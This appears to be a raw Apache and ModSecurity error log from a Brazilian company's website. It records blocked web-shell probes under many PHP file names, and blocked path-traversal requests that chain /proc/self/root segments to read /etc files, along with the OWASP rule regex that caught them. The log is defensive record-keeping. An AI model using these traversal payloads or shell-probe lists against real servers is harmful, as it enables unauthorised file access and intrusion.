https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:50:06.723310 2026] [access_compat:error] [pid 21533:tid 140411683178240] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ng.php
[Mon Mar 16 13:50:06.856796 2026] [access_compat:error] [pid 21533:tid 140411582465792] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/app.php
[Mon Mar 16 13:50:06.998632 2026] [access_compat:error] [pid 21533:tid 140411565680384] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sw.php
[Mon Mar 16 13:50:07.132388 2026] [access_compat:error] [pid 21533:tid 140411607643904] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/vfr.php
[Mon Mar 16 13:50:07.283126 2026] [access_compat:error] [pid 21533:tid 140411616036608] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wgift1.php
[Mon Mar 16 13:50:07.413097 2026] [access_compat:error] [pid 21533:tid 140411641214720] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/torsa1.php
[Mon Mar 16 13:50:07.542339 2026] [access_compat:error] [pid 21533:tid 140411699963648] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/zogy1.php
[Mon Mar 16 13:50:07.690381 2026] [access_compat:error] [pid 21533:tid 140411708356352] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/zoper1.php
[Mon Mar 16 13:50:09.477527 2026] [access_compat:error] [pid 21533:tid 140411691570944] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/maint/Jcrop.php
[Mon Mar 16 13:50:09.635126 2026] [access_compat:error] [pid 21533:tid 140411658000128] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/inege.php
[Mon Mar 16 13:50:09.763694 2026] [access_compat:error] [pid 21533:tid 140411599251200] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/acjsn.php
[Mon Mar 16 13:50:09.898352 2026] [access_compat:error] [pid 21533:tid 140411666392832] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/adnks.php
[Mon Mar 16 13:50:10.034787 2026] [access_compat:error] [pid 21533:tid 140411624429312] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ahiqq.php
[Mon Mar 16 13:50:10.171190 2026] [access_compat:error] [pid 21533:tid 140411649607424] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/tool.php
[Mon Mar 16 13:50:10.799507 2026] [access_compat:error] [pid 21533:tid 140411733534464] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/an9.php
[Mon Mar 16 13:50:10.937325 2026] [access_compat:error] [pid 21533:tid 140411574073088] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/aqups.php
[Mon Mar 16 13:50:11.066847 2026] [access_compat:error] [pid 21533:tid 140411741927168] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/bpltp.php
[Mon Mar 16 13:50:11.222997 2026] [access_compat:error] [pid 21533:tid 140411557287680] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/byp9.php
[Mon Mar 16 13:50:11.406299 2026] [access_compat:error] [pid 21533:tid 140411716749056] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/fs9.php
[Mon Mar 16 13:50:11.567631 2026] [access_compat:error] [pid 21805:tid 140411666392832] [client 20.151.2.242:59732] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/genco.php
[Mon Mar 16 13:50:11.699342 2026] [access_compat:error] [pid 21805:tid 140411616036608] [client 20.151.2.242:59732] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/p23duw.php
[Mon Mar 16 13:50:11.832618 2026] [access_compat:error] [pid 21805:tid 140411658000128] [client 20.151.2.242:59732] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/pu9.php
[Mon Mar 16 13:50:11.964679 2026] [access_compat:error] [pid 21805:tid 140411624429312] [client 20.151.2.242:59732] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/pu8.php
[Mon Mar 16 13:50:12.095221 2026] [access_compat:error] [pid 21805:tid 140411683178240] [client 20.151.2.242:59732] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/aifa.php
[Mon Mar 16 13:50:12.227769 2026] [access_compat:error] [pid 21805:tid 140411540502272] [client 20.151.2.242:59732] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/aee.php
[Mon Mar 16 13:50:13.001114 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:56040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0xLABkC4fWIHEf8HzcAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:50:13.244406 2026] [access_compat:error] [pid 10772:tid 140411540502272] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/nc4.php
[Mon Mar 16 13:50:13.393506 2026] [access_compat:error] [pid 10772:tid 140411708356352] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/vaza.php
[Mon Mar 16 13:50:13.540070 2026] [access_compat:error] [pid 10772:tid 140411565680384] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/rithin.php
[Mon Mar 16 13:50:13.677063 2026] [access_compat:error] [pid 10772:tid 140411548894976] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp9.php
[Mon Mar 16 13:50:13.823966 2026] [access_compat:error] [pid 10772:tid 140411733534464] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/4pocjn.php
[Mon Mar 16 13:50:13.973951 2026] [access_compat:error] [pid 10772:tid 140411574073088] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/vir-v2.php
[Mon Mar 16 13:50:14.103841 2026] [access_compat:error] [pid 10772:tid 140411632822016] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/gm.php
[Mon Mar 16 13:50:14.254310 2026] [access_compat:error] [pid 10772:tid 140411683178240] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/btx25.php
[Mon Mar 16 13:50:14.386018 2026] [access_compat:error] [pid 10772:tid 140411725141760] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/v4.php
[Mon Mar 16 13:50:14.519173 2026] [access_compat:error] [pid 10772:tid 140411599251200] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/v2.php
[Mon Mar 16 13:50:14.676675 2026] [access_compat:error] [pid 10772:tid 140411658000128] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wo.php
[Mon Mar 16 13:50:14.827617 2026] [access_compat:error] [pid 10772:tid 140411699963648] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wander.php
[Mon Mar 16 13:50:14.968018 2026] [access_compat:error] [pid 10772:tid 140411674785536] [client 20.151.2.242:59748] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/amax.php
[Mon Mar 16 13:50:15.103390 2026] [access_compat:error] [pid 10772:tid 140411741927168] [client 20.151.2.242:59768] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/hckpe.php
[Mon Mar 16 13:50:15.243310 2026] [access_compat:error] [pid 10772:tid 140411624429312] [client 20.151.2.242:59768] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ht.php
[Mon Mar 16 13:50:15.394855 2026] [access_compat:error] [pid 10772:tid 140411557287680] [client 20.151.2.242:59768] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sd.php
[Mon Mar 16 13:50:15.599410 2026] [access_compat:error] [pid 10772:tid 140411590858496] [client 20.151.2.242:59768] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/blog.php
[Mon Mar 16 13:50:15.749995 2026] [access_compat:error] [pid 10772:tid 140411649607424] [client 20.151.2.242:59768] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/maint/max.php
[Mon Mar 16 13:52:04.695866 2026] [:error] [pid 15568:tid 140411632822016] [client 74.7.228.16:37908] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg1NKQpVkWug9HeOt87cgAAA00"]
[Mon Mar 16 13:52:09.532354 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:54504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1OaQpVkWug9HeOt87fQAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:52:10.914776 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.241.46:49890] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1OrysWC90G-1nBrBKdwAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:52:24.740129 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:39202] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1SLABkC4fWIHEf8H0JgAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:53:52.220623 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.243.203:55444] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1oFajLEzk2WiQ-10YVAAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:54:10.759456 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:49900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1sv9ocpUE4ed4uDz1gwAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:54:19.305682 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.244.31:53096] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg1u6QpVkWug9HeOt87ogAAA08"]
[Mon Mar 16 13:54:19.331558 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:50160] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1u46lpbStxTqkSktyvwAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:54:25.308593 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:59216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1wbysWC90G-1nBrBKogAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:30.135578 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.241.46:59230] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1xpqj1wV0Si-Okef1RQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:31.482371 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.241.46:38084] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1x1ajLEzk2WiQ-10YXgAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:33.551335 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.241.46:38094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1yKTCbgAP5jq5Tegw_AAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:35.051964 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.241.46:38102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1y5qj1wV0Si-Okef1SQAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:38.460708 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:38106] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1zY6lpbStxTqkSktyxQAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:39.798985 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:48558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1z9SswJuvopo3lOhlNQAAAJY"], referer: 